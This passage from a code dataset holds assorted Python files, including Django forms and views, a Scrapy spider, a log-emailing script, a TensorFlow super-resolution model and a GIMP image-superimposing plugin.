print(lat, lon)\n elif len(p.loc) == 2: # lat lon\n maiden = maidenhead.toMaiden(p.loc[0], p.loc[1], p.precision)\n print(maiden)\n else:\n print(\n \"specify Maidenhead grid (single string) or lat lon (with space between)\",\n file=sys.stderr,\n )\n\n if p.url:\n print(maidenhead.google_maps(maiden))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Maidenhead.py","file_name":"Maidenhead.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"653123274","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.time_entries.models import TimeEntry\n\n\nclass TimeEntryCreateForm(forms.ModelForm):\n\n class Meta:\n model = TimeEntry\n fields = (\n \"project\", \"issue\", \"spent_on\", \"hours\", \"comments\", \"activity\"\n )\n\n\nclass IssueTimeEntryCreateForm(forms.ModelForm):\n\n class Meta:\n model = TimeEntry\n fields = (\"issue\", \"spent_on\", \"hours\", \"comments\", \"activity\")\n\n def __init__(self, *args, **kwargs):\n super(IssueTimeEntryCreateForm, self).__init__(*args, **kwargs)\n self.fields['activity'].empty_label = _(\"---Please select---\")\n self.fields['hours'].label = _(\"Hours\")\n self.fields['hours'].widget = forms.TextInput()\n","sub_path":"itracker/apps/time_entries/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"122508254","text":"from amazonscrape.items import AmazonscrapeItem\nimport scrapy\n\n\nclass AmazonSpider(scrapy.Spider):\n name = 'amazon'\n start_urls = ['https://www.amazon.com/best-sellers-books-Amazon/zgbs/books/ref=zg_bs_nav_0/']\n\n def parse(self, response):\n item = AmazonscrapeItem()\n books = response.css('.aok-relative')\n for book in books:\n item['name'] = book.css('.p13n-sc-truncate-desktop-type2::text').get().replace('\\n', '').strip()\n author = book.css('.a-link-child::text').get()\n if not author:\n author = book.css('.a-color-base::text').get()\n item['author'] = author\n item['image'] = book.css('.a-spacing-small img::attr(src)').get()\n item['price'] = book.css('.p13n-sc-price::text').get()\n yield item\n next_page = response.css('.a-last a::attr(href)').extract()\n print(next_page)\n if next_page:\n yield response.follow(next_page[0], callback=self.parse)\n","sub_path":"DataScience/Tutorial/WebScraping/Scrapy/amazonscrape/amazonscrape/spiders/amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"352158135","text":"from .version import __version__\nfrom .boxes import sum_y, sum_x, answer, reverse_answer\nfrom .boxes_input import get_input_from_file, calculate_ids\n\n\n__all__ = [\n 'sum_y',\n 'sum_x',\n 'answer',\n 'reverse_answer',\n 'get_input_from_file',\n 'calculate_ids'\n]\n","sub_path":"boxbox/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"60564074","text":"from pymongo import MongoClient \nfrom tasks import *\nimport sys\n\nclient = MongoClient()\n\ndb = client.test\ncollection = db.mso\n\n# find all fail experiments\n\nproblems = {\n '8bit' : [TaskA(), TaskB()],\n '9bit' : [TaskC(), TaskD()],\n '10bit' : [TaskE(), TaskF()],\n 'breast-cancer' : [TaskG(), TaskH()],\n 'tic-tac-toe' : [TaskJ(), 
TaskK()],\n 'ionosphere' : [TaskL(), TaskM()], \n}\n\nfor experiment_id in collection.distinct('experiment_id'):\n for algorithm in collection.find({'experiment_id': experiment_id}).distinct('algorithm'):\n for task in collection.find({'experiment_id': experiment_id, 'algorithm': algorithm}).distinct('task'):\n item = collection.find_one({'experiment_id': experiment_id, 'task': task, 'algorithm': algorithm})\n if 'test_mse' in item:\n if len(item['test_mse']) != 1200:\n for item in collection.find({'experiment_id': experiment_id, 'task': task, 'algorithm': algorithm}):\n test_mse = item['test_mse'][[type(_).__name__ for _ in problems[experiment_id]].index(task)::2]\n collection.update(\n {'_id': item['_id']},\n {'$set':{'test_mse': test_mse}}\n )\n","sub_path":"publication/neural-mfea/support/fix_dataset.py","file_name":"fix_dataset.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"457052201","text":"import sensors.sensor as sensor\nfrom sensors import Variable\n\nif __name__ == '__main__':\n\n watts = Variable(\n name='wattage',\n a=3,\n b=1500,\n variance=10,\n limit=2000\n )\n\n temps = Variable(\n name='temperature',\n a=-0.01,\n b=22,\n variance=0.1,\n limit=20\n )\n\n # create heater sensor and run it\n heater = sensor.Sensor('heater', [watts, temps])\n heater.run_simulation()\n","sub_path":"sensors/heater_app/simulate_heater.py","file_name":"simulate_heater.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"87086438","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Script performed to send login_activity.txt file to a user\r\n\r\nimport smtplib\r\n\r\nfrom datetime import date\r\nfrom email.MIMEMultipart import MIMEMultipart\r\nfrom email.MIMEText import MIMEText\r\nfrom email.MIMEBase import MIMEBase\r\nfrom email import encoders\r\n\r\n# Send The Log File Before Erasing #\r\n\r\nmsg = MIMEMultipart()\r\nmsg['From'] = 'someone@gmail.com'\r\nrecipients = 'bob.dupont@gmail.com'\r\nmsg['Subject'] = 'Login Activity' \r\nmessage = 'Hi! 
\\n Please find the logs for the : {}/{}/{}.'.format(date.today().day, date.today().month, date.today().year)\r\n\r\nfilename = \"login_activity.txt\"\r\nattachment = open(\"/home/ubuntu/login_activity.txt\", \"rb\")\r\n \r\npart = MIMEBase('application', 'octet-stream')\r\npart.set_payload((attachment).read())\r\nencoders.encode_base64(part)\r\npart.add_header('Content-Disposition', \"attachment; filename= {}\".format(filename))\r\n \r\nmsg.attach(part)\r\n\r\nmsg.attach(MIMEText(message))\r\nmailserver = smtplib.SMTP('smtp.gmail.com', 587) # using gmail SMTP server\r\nmailserver.ehlo()\r\nmailserver.starttls()\r\nmailserver.ehlo()\r\nmailserver.login('login', 'password')\r\nmailserver.sendmail(msg['From'], recipients, msg.as_string())\r\nmailserver.quit()\r\n\r\n\r\n# Erase File logs #\r\n\r\nwith open('/home/ubuntu/login_activity.txt', 'w') as file:\r\n\tfile.write('')\r\n\tfile.close()\r\n\r\n","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593331497","text":"from io import BytesIO\nimport lxml.html\nfrom PIL import Image\nimport download\ndef get_captcha():\n #tree = lxml.html.fromstring(html)\n #img_data = html.cssselect('div.mydiv img')[0].get('src')\n #img = img_data.replace('..','')\n #print(img)\n new_data =\"http://callback.58.com/firewall/code/710717830/f749e7b5717241eba8319dfc0eac4694.do\" \n print(new_data)\n img_data = download.download_url(new_data)\n \n #print(img_data)\n #img_data = img_data.partition(',')[-1]\n #binary_img_data = img_data.decode('base64')\n file_like = BytesIO(img_data)\n img = Image.open(file_like)\n #img = Image.open(img_data)\n img.show()\n img.save('test.jpeg')\n print(img)\nget_captcha()\n\n","sub_path":"register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"42980222","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass ListNode:\n def __init__(self, *args, **kwargs):\n if type(args[0]) is int:\n self.val = args[0]\n self.next = None\n\n if type(args[0]) is list:\n self.val = args[0][0] if len(args[0]) > 0 else None\n self.next = ListNode(args[0][1:]) if len(args[0]) > 1 else None\n\n def print_list_val(self):\n target = self\n\n while target.next is not None:\n print(target.val, end=' > ')\n target = target.next\n\n print(target.val)\n\n\ndef cal_list_value(node: ListNode) -> int:\n a = ''\n while True:\n a = str(node.val) + a\n if node.next is None:\n break\n node = node.next\n\n return int(a)\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n c = cal_list_value(l1) + cal_list_value(l2)\n answer = ListNode(0)\n p = answer\n\n for _ in range(len(str(c))):\n p.next = ListNode(c % 10)\n p = p.next\n c = c // 10\n\n return answer.next\n\n\ns = Solution()\ns.addTwoNumbers(ListNode([2, 4, 3]), ListNode([5, 6, 4])).print_list_val()\n\n\"\"\"\nRuntime: 76 ms, faster than 30.04% of Python3 online submissions for Add Two Numbers.\nMemory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for Add Two 
Numbers.\n\nhttps://leetcode.com/problems/add-two-numbers/discuss/352181/Python3-Carry-sum10\n\"\"\"","sub_path":"0001/0002_Add_Two_Numbers.py","file_name":"0002_Add_Two_Numbers.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639307875","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2018-2020- Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Represent provenance processes.\"\"\"\n\nimport weakref\n\nfrom renku.core.models import jsonld as jsonld\nfrom renku.core.models.entities import CommitMixin\n\n\n@jsonld.s(\n type=[\n 'wfdesc:Process',\n 'prov:Entity',\n 'prov:Plan',\n ],\n context={\n 'wfdesc': 'http://purl.org/wf4ever/wfdesc#',\n 'prov': 'http://www.w3.org/ns/prov#',\n },\n cmp=False,\n)\nclass Process(CommitMixin):\n \"\"\"Represent a process.\"\"\"\n\n _activity = jsonld.ib(\n default=None,\n context='prov:activity',\n kw_only=True,\n converter=lambda value: weakref.ref(value)\n if value is not None else None,\n type='renku.core.models.provenance.activities.Activity'\n )\n\n @property\n def activity(self):\n \"\"\"Return the activity object.\"\"\"\n return self._activity()\n\n\n@jsonld.s(\n type=[\n 'wfdesc:Workflow',\n 'prov:Entity',\n 'prov:Plan',\n ],\n context={\n 'wfdesc': 'http://purl.org/wf4ever/wfdesc#',\n 'prov': 'http://www.w3.org/ns/prov#',\n },\n cmp=False,\n)\nclass Workflow(Process):\n \"\"\"Represent workflow with subprocesses.\"\"\"\n\n subprocesses = jsonld.ib(context='wfdesc:hasSubProcess', kw_only=True)\n\n @subprocesses.default\n def default_subprocesses(self):\n \"\"\"Load subprocesses.\"\"\"\n return [\n subprocess.association.plan\n for subprocess in self.activity.subprocesses.values()\n ]\n","sub_path":"renku/core/models/provenance/processes.py","file_name":"processes.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"64765638","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport theano\n\nfrom . 
import NeuralLayer\nfrom deepy.utils import global_theano_rand, FLOATX\n\nclass Dropout(NeuralLayer):\n\n def __init__(self, p):\n super(Dropout, self).__init__(\"dropout\")\n self.p = p\n\n def compute_tensor(self, x):\n if self.p > 0:\n # deal with the problem of test_value\n backup_test_value_setting = theano.config.compute_test_value\n theano.config.compute_test_value = 'ignore'\n binomial_mask = global_theano_rand.binomial(x.shape, p=1-self.p, dtype=FLOATX)\n theano.config.compute_test_value = backup_test_value_setting\n # apply dropout\n x *= binomial_mask\n return x\n\n def compute_test_tesnor(self, x):\n if self.p > 0:\n x *= (1.0 - self.p)\n return x\n","sub_path":"deepy/layers/dropout.py","file_name":"dropout.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"487412787","text":"a=\" Write a Python program to find the list of words\"\nb=a.split()\nn=int(input(\"enter : \"))\ndef name(a,n):\n\tfor i in b:\n\t\tif len(i)>n:\n\t\t\t print(i)\nprint(name(b,n))\nprint([i for i in b if len(i)>n])\nprint(list(filter(lambda x: (x in b) and (len(x)>n) ,b)))\n","sub_path":"python_practice/W3_lists/eg_10.py","file_name":"eg_10.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"463994466","text":"import tensorflow as tf\n\n\ndef srvc_base(lr, scale, F, block_h, block_w):\n est = lr\n patches = tf.space_to_batch_nd(lr, block_shape=[block_h, block_w], paddings=[[0, 0], [0, 0]])\n\n features = tf.layers.conv2d(patches, 256, 3, strides=(1, 1), padding='valid',\n data_format='channels_last', dilation_rate=(1, 1), activation=tf.nn.relu,\n use_bias=True)\n kernel = tf.layers.conv2d(features, 3 * 3 * 3 * F, 3, strides=(1, 1), padding='valid',\n data_format='channels_last', dilation_rate=(1, 1), activation=None,\n use_bias=True)\n bias = tf.layers.conv2d(features, F, 3, strides=(1, 1), padding='valid',\n data_format='channels_last', dilation_rate=(1, 1), activation=None,\n use_bias=True)\n kernel = tf.reshape(kernel, [-1, 1, 1, 3 * 3 * 3, F])\n bias = tf.reshape(bias, [-1, 1, 1, F])\n\n patches = tf.image.extract_patches(patches, sizes=[1, 3, 3, 1], strides=[1, 1, 1, 1], rates=[1, 1, 1, 1],\n padding='SAME')\n patches = tf.expand_dims(patches, axis=3)\n patches = tf.matmul(patches, kernel)\n patches = tf.squeeze(patches, axis=3) + bias\n patches = tf.nn.relu(patches)\n est = tf.batch_to_space_nd(patches, block_shape=[block_h, block_w], crops=[[0, 0], [0, 0]])\n\n est = tf.layers.conv2d(est, 128, 5, strides=(1, 1), padding='same',\n data_format='channels_last', dilation_rate=(1, 1), activation=tf.nn.relu,\n use_bias=True)\n est = tf.layers.conv2d(est, 32, 3, strides=(1, 1), padding='same',\n data_format='channels_last', dilation_rate=(1, 1), activation=tf.nn.relu,\n use_bias=True)\n est = tf.layers.conv2d(est, 3 * scale * scale, 3, strides=(1, 1), padding='same',\n data_format='channels_last', dilation_rate=(1, 1), activation=None,\n use_bias=True)\n est = tf.nn.depth_to_space(est, scale, data_format='NHWC')\n indepth_est = est\n return indepth_est\n\n\ndef srvc(lr):\n scale = 4\n F = 32\n block_h = tf.shape(lr)[1] / 5\n block_w = tf.shape(lr)[2] / 5\n return srvc_base(lr, scale, F, block_h, block_w)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
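The srvc model above predicts a distinct 3x3x3-to-F kernel and bias for every spatial block and applies them with extract_patches plus a matmul. A minimal NumPy sketch of that per-block dynamic-filtering step follows; the shapes and random inputs are illustrative only, not the TF graph above:

import numpy as np

def dynamic_conv_block(block, kernel, bias):
    # block  : (H, W, C) pixels of one spatial block
    # kernel : (3 * 3 * C, F) flattened filter bank predicted for this block
    # bias   : (F,) bias predicted for this block
    h, w, c = block.shape
    padded = np.pad(block, ((1, 1), (1, 1), (0, 0)), mode="edge")
    # im2col: gather the 3x3xC neighbourhood of every pixel
    patches = np.empty((h, w, 3 * 3 * c))
    for dy in range(3):
        for dx in range(3):
            k = (dy * 3 + dx) * c
            patches[:, :, k:k + c] = padded[dy:dy + h, dx:dx + w, :]
    # one matmul applies the block's own kernel to every pixel at once
    return np.maximum(patches @ kernel + bias, 0.0)  # ReLU, as in the model

rng = np.random.default_rng(0)
out = dynamic_conv_block(rng.standard_normal((8, 8, 3)),
                         rng.standard_normal((27, 32)) * 0.1,  # F = 32
                         np.zeros(32))
print(out.shape)  # (8, 8, 32)

Flattening each 3x3 neighbourhood into one row is what lets a single predicted kernel serve every pixel of its block in one matrix product, which is exactly why the model reshapes its kernel tensor to (..., 3*3*3, F) before the matmul.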
+{"seq_id":"144064794","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom .models import Group, Site\n\n# Create your views here.\ndef index(request):\n\tgroups = Group.objects.all()\n\tcontext = {'groups': groups}\n\treturn render(request, 'homepage_app/index.html', context)\n\n# Get the HTML of the sites inside a group specified in the request\ndef group(request):\n\tgroup_name = request.GET[\"group\"]\n\tgroup = Group.objects.get(pk=group_name)\n\treturn render(request, \"homepage_app/sites.html\", {'group':group})\n\ndef add_site(request):\n\t# get the group to which the site is added\n\tgroup_id = request.POST[\"group\"]\n\tgroup = Group.objects.get(pk=group_id)\n\n\t# get the new site info\n\tsite_name = request.POST[\"name\"]\n\tsite_link = request.POST[\"link\"]\n\n\tif request.POST[\"action\"]:\n\t\tgroup.add_site(name=site_name, link=site_link, in_action=request.POST[\"action\"])\n\telse:\n\t\tgroup.add_site(name=site_name, link=site_link)\n\n\treturn HttpResponse(\"Site saved\");\n\ndef delete_site(request):\n\tsite_name = request.POST[\"site\"]\n\tsite = Site.objects.get(pk=site_name)\n\tsite.delete()\n\treturn HttpResponse(\"Site deleted\")\n\ndef move_site(request):\n\tsite_name = request.POST[\"site\"]\n\tgroup_name = request.POST[\"group\"]\n\n\tsite = Site.objects.get(pk=site_name)\n\tsite.move_to_group(group_name)\n","sub_path":"homepage_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"440133357","text":"from django.shortcuts import render\nfrom django.template.loader import get_template\nfrom django.http import HttpResponse\nfrom datetime import datetime\n\n# Create your views here.\ndef index(request, tvno='0'):\n tv_list = [{'name':'CCTV News', 'tvcode':'yPhFG2I0dE0'},\n {'name':'CCTV Chinese international', 'tvcode':'E1DTZBy4xr4'},]\n \n template = get_template('index.html')\n now = datetime.now()\n tvno = tvno\n tv = tv_list[int(tvno)]\n hour = now.timetuple().tm_hour\n html = template.render(locals())\n return HttpResponse(html)\n\ndef carlist(request, maker=0):\n car_maker = ['SAAB', 'Ford', 'Honda', 'Mazda', 'Nissan','Toyota' ]\n car_list = [ [],\n ['Fiesta', 'Focus', 'Modeo', 'EcoSport', 'Kuga', 'Mustang'],\n ['Fit', 'Odyssey', 'CR-V', 'City', 'NSX'],\n ['Mazda3', 'Mazda5', 'Mazda6', 'CX-3', 'CX-5', 'MX-5'],\n ['Tida', 'March', 'Livina', 'Sentra', 'Teana', 'X-Trail', 'Juke', 'Murano'],\n ['Camry','Altis','Yaris','86','Prius','Vios', 'RAV4', 'Wish']\n ]\n maker = int(maker)\n maker_name = car_maker[maker]\n cars = car_list[maker]\n template = get_template('carlist.html')\n html = template.render(locals())\n\n return HttpResponse(html)\n\ndef carprice(request, maker=0):\n car_maker = ['Ford', 'Honda', 'Mazda']\n car_list = [[\t{'model':'Fiesta', 'price': 203500}, \n {'model':'Focus','price': 605000}, \n {'model':'Mustang','price': 900000}],\n [\t{'model':'Fit', 'price': 450000}, \n {'model':'City', 'price': 150000}, \n {'model':'NSX', 'price':1200000}],\n [\t{'model':'Mazda3', 'price': 329999}, \n {'model':'Mazda5', 'price': 603000},\n {'model':'Mazda6', 'price':850000}],\n ]\n maker = int(maker)\n maker_name = car_maker[maker]\n cars = car_list[maker]\n template = get_template('carprice.html')\n html = template.render(locals())\n\n return HttpResponse(html) 
","sub_path":"mainsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"139999290","text":"#!/usr/bin/env python\n\n# Scale an image and then set its size so that is 1920 x 1080 in resolution.\n#\n# To invoke this Plugin from the command line, use a command which is similar to the following;\n#\n# gimp --no-interface \\\n# --verbose \\\n# --console-messages \\\n# --batch-interpreter=\"plug-in-script-fu-eval\" \\\n# --batch '(python-fu-batch-scale-and-set-size-noninterctive RUN-NONINTERACTIVE 1920 1080 3 \"/home/foo/fileList.txt\")' \\\n# --batch \"(gimp-quit 1)\"\n#\n# /home/foo/fileList.txt should be a file that contains a list of those files (one per line)\n# which should be operated on by the Plugin.\n#\n# Exmples of locations within which Gimp Plugins can reside;\n#\n# - /home/foo/.gimp-2.x/plug-ins\n# - /usr/lib/gimp/2.0/plug-ins\n\n\nfrom os import path\nfrom gimpfu import register, main, pdb, gimp, PF_IMAGE, PF_DRAWABLE, PF_INT, PF_STRING, PF_FILE, INTERPOLATION_NONE, INTERPOLATION_LINEAR, INTERPOLATION_CUBIC, INTERPOLATION_LANCZOS, PF_RADIO\n\nimport gtk\n\n\ndef \\\nsuperimpose_image_over_another_noninteractive(\n\n # image,\n # drawable,\n list_filenames,\n list_filenames_superimpose\n # horizontalLocation,\n # verticalLocation\n) :\n\n\tnameFunction = \"superimpose_image_over_another_interactive\"\n\n\tprint(\"----------------------------------------\")\n\tprint(\"%s : Enter\" % (nameFunction))\n\n\tIFS = \";\"\n\n\t# listFiles = fileContents.split(IFS)\n\n\tlistFiles = list_filenames.split(IFS)\n\tlistFiles_superimpose = list_filenames_superimpose.split(IFS)\n\n\tprint(\"%s : Number of elements in list = %d\" % (nameFunction, len(listFiles)))\n\tprint(\"%s : File list = %s\" % (nameFunction, listFiles))\n\t\n\tprint(\"%s : Number of elements in list = %d\" % (nameFunction, len(listFiles_superimpose)))\n\tprint(\"%s : File list = %s\" % (nameFunction, listFiles_superimpose))\n\t\n\tif (len(listFiles) == 0) :\n\n\t\tprint(\"%s : Number of background image files = 0 : a\") % (nameFunction)\n\n\t\t# errdialog = gtk.MessageDialog(\n\t\t# None,\n\t\t# 0,\n\t\t# gtk.MESSAGE_ERROR,\n\t\t# gtk.BUTTONS_OK,\n\t\t# \"A) You must specify at least one background image file.\"\n\t\t# )\n\t\t# errdialog.show_all()\n\t\t# errdialog.run()\n\n\t\t# raise Exception(\"You must specify at least one background image file.\")\n\n\telif (len(listFiles_superimpose) == 0) :\n\n\t\tgimp.message(\"B) You must specify at least one superimpose image file.\")\n\t\tprint(\"%s : Number of superimpose image files = 0 : a\") % (nameFunction)\n\t\t# raise Exception(\"You must specify at least one superimpose image file.\")\n\n\t# elif (len(listFiles) == 1) : and \n\telif (listFiles[0] == '') :\n\n\t\tgimp.message(\"C) You must specify at least one background image file.\")\n\t\tprint(\"%s : Number of background image files = 0 : b\") % (nameFunction)\n\t\t# raise Exception(\"You must specify at least one background image file.\")\n\n\t# elif (len(listFiles_superimpose) == 1) and \n\telif (listFiles_superimpose[0] == '') :\n\n\t\tgimp.message(\"D) You must specify at least one superimpose image file.\")\n\t\tprint(\"%s : Number of superimpose image files = 0 : b\") % (nameFunction)\n\t\t# raise Exception(\"You must specify at least one superimpose image file.\")\n\n\telif len(listFiles) != len(listFiles_superimpose) :\n\n\t\tgimp.message(\"E) The number of files specified must be the 
same for both background and superimpose images.\")\n\t\tprint(\"%s : The number of files specified must be the same for both background and superimpose images!\" % (nameFunction))\n\t\treturn\n\n\tindexList = 0\n\n\tfor filename in listFiles :\n\n\t\tindexList = indexList + 1\n\n\t\tprint(\"%s : ========================================\" % (nameFunction))\n\t\tprint(\"%s : Filename = %s\" % (nameFunction, filename))\n\t\tprint(\"%s : ========================================\" % (nameFunction))\n\n\t\tif (not path.isfile(filename)) :\n\n\t\t\tprint(\"%s : > is NOT a file\" % (nameFunction))\n\t\t\t\n\t\t\tcontinue\n\n\t\tfilename_superimpose = listFiles_superimpose[indexList - 1]\n\n\t\tprint(\"%s : ========================================\" % (nameFunction))\n\t\tprint(\"%s : Filename of image to superimpose = %s\" % (nameFunction, filename_superimpose))\n\t\tprint(\"%s : ========================================\" % (nameFunction))\n\t\n\t\tif (not path.isfile(filename_superimpose)) :\n\t\t\n\t\t\tprint(\"%s : > is NOT a file\" % (nameFunction))\n\t\t\t# skip this pair as well, rather than trying to load a missing file\n\t\t\tcontinue\n\n\t\tgimp.progress_init(\"Superimposing one image over the other\")\n\n\t\timage = pdb.gimp_file_load(filename, filename)\n\t\tdrawable = pdb.gimp_image_get_active_layer(image)\n\n\t\t# Start a GIMP Undo group, as this will allow the actions of this Plugin to be undone in one step.\n\n\t\tpdb.gimp_undo_push_group_start(image)\n\n\t\twidthImage = image.width\n\t\theightImage = image.height\n\t\t\n\t\twidthDrawable = drawable.width\n\t\theightDrawable = drawable.height\n\t\n\t\tprint(\"Width image = %s\" % widthImage)\n\t\tprint(\"Height image = %s\" % heightImage)\n\t\tprint(\"Width drawable = %s\" % widthDrawable)\n\t\tprint(\"Height drawable = %s\" % heightDrawable)\n\t\t# print(\"Horizontal location = %s\" % horizontalLocation)\n\t\t# print(\"Vertical location = %s\" % verticalLocation)\n\t\tprint(\"Image filename = %s\" % image.filename)\n\t\n\t\t# Open the image file to be superimposed and get its drawable object.\n\t\n\t\timage_super = pdb.gimp_file_load(filename_superimpose, filename_superimpose)\n\t\tdrawable_super = pdb.gimp_image_get_active_layer(image_super)\n\t\n\t\tprint(\"Width super image = %s\" % image_super.width)\n\t\tprint(\"Height super image = %s\" % image_super.height)\n\t\tprint(\"Width super drawable = %s\" % drawable_super.width)\n\t\tprint(\"Height super drawable = %s\" % drawable_super.height)\n\t\n\t\t# Copy the superimpose image into the edit buffer, ready for pasting\n\t\t# into the background image.\n\t\t\n\t\tcopy_result = pdb.gimp_edit_copy(drawable_super)\n\t\t\n\t\tprint(\"Selection copy result = %s\" % copy_result)\n\t\n\t\t# pdb.gimp_drawable_update(drawable, horizontalLocation, verticalLocation, 384, 216)\n\t\n\t\t# The following operation should paste the image which is in the buffer, into a new layer of the\n\t\t# original image.\n\t\n\t\tpdb.gimp_edit_paste(drawable, True)\n\t\t\n\t\twidthImage = image.width\n\t\theightImage = image.height\n\t\t\n\t\twidthDrawable = drawable.width\n\t\theightDrawable = drawable.height\n\t\n\t\tprint(\"Width image = %s\" % widthImage)\n\t\tprint(\"Height image = %s\" % heightImage)\n\t\tprint(\"Width drawable = %s\" % widthDrawable)\n\t\tprint(\"Height drawable = %s\" % heightDrawable)\n\t\t# print(\"Horizontal location = %s\" % 
horizontalLocation)\n\t\t# print(\"Vertical location = %s\" % verticalLocation)\n\t\t\n\t\t# Move the \n\t\t\n\t\t# pdb.gimp_drawable_update()\n\t\t\n\t\tdrawable_new = pdb.gimp_image_flatten(image)\n\t\t\n\t\tpdb.gimp_file_save(\n\t\n\t\t image,\n\t\t drawable_new,\n\t\t filename,\n\t\t filename\n\t\t)\n\n\t\t# End the GIMP Undo group.\n\n\t\tpdb.gimp_undo_push_group_end(image)\n\n\t\t# Close the image now that we have finished with it, otherwise it will use up memory unnecessarily.\n\n\t\tpdb.gimp_image_delete(image)\n\n\t# End of for loop.\n\n\tprint(\"%s : Exit\" % (nameFunction))\n\n\n# register(\n#\t\"superimpose_image_over_another_interactive\", # The name of the command.\n#\t\"Superimpose one image over the top of another.\", # A brief description of the command.\n#\t\"Superimpose one image over the top of another.\", # Help message.\n#\t\"Craig Sanders\", # Author.\n#\t\"Craig Sanders\", # Copyright holder.\n#\t\"2018\", # Date.\n#\t\"Superimpose one image over another\", # The way the script will be referred to in the menu.\n#\t\"RGB*, GRAY*\", # Image mode\n#\t[\n#\t\t(PF_IMAGE, \"image\", \"Input image\", None),\n#\t\t(PF_DRAWABLE, \"drawable\", \"Input layer\", None),\n#\t\t(PF_FILE, \"filename\", \"Save image using a different filename.\\nLeave as (None) to save using the\\ncurrent filename.\", None)\n#\t],\n#\t[],\n#\tscale_and_set_size_interactive,\n#\tmenu=\"/Image/Superimpose one image over the top of another.\")\n\n\nregister(\n\t\"superimpose_image_over_another_noninteractive\", # The name of the command.\n\t\"Superimpose an image over the top of another.\", # A brief description of the command.\n\t\"Superimpose an image over the top of another.\", # Help message.\n\t\"Craig Sanders\", # Author.\n\t\"Craig Sanders\", # Copyright holder.\n\t\"2018\", # Date.\n\t\"Superimpose an image over another\", # The way the script will be referred to in the menu.\n\t# \"RGB*, GRAY*\", # Image mode\n\t\"\", # Create a new image, don't work on an existing one.\n\t[\n\t\t# (PF_IMAGE, \"image\", \"Input image\", None),\n\t\t# (PF_DRAWABLE, \"drawable\", \"Input layer\", None),\n\t\t# (PF_FILE, \"filename\", \"Image to superimpose over current image.\", None),\n\t\t(PF_STRING, \"list_filenames\", \"Files which contain background images\\n(Multiple files should be separated by ';' characters)\", \"\"),\n\t\t(PF_STRING, \"list_filenames_superimpose\", \"Files which contain images to superimpose\\n(Multiple files should be separated by ';' characters)\", \"\")\n\t\t# (PF_INT, \"horizontalLocation\", \"Horizontal location of superimposed image (in pixels)\", 0),\n\t\t# (PF_INT, \"verticalResolution\", \"Vertical location of superimposed image (in pixels)\", 0)\n\t],\n\t[],\n\tsuperimpose_image_over_another_noninteractive,\n\tmenu=\"/Image/Craig's Utilities/\")\n\n\n# register(\n#\t\"superimpose_image_over_another_noninteractive\", # The name of the command.\n#\t\"Superimpose an image over the top of another.\", # A brief description of the command.\n#\t\"Superimpose an image over the top of another.\", # Help message.\n#\t\"Craig Sanders\", # Author.\n#\t\"Craig Sanders\", # Copyright holder.\n#\t\"2018\", # Date.\n#\t\"Superimpose one image over another\", # The way the script will be referred to in the menu.\n#\t# \"RGB*, GRAY*\", # Image mode\n#\t\"\", # Create a new image, don't work on an existing one.\n#\t[\n#\t\t(PF_INT, \"horizontalResolution\", \"Horizontal resolution (in pixels)\", 1920),\n#\t\t(PF_INT, \"verticalResolution\", \"Vertical resolution (in pixels)\", 
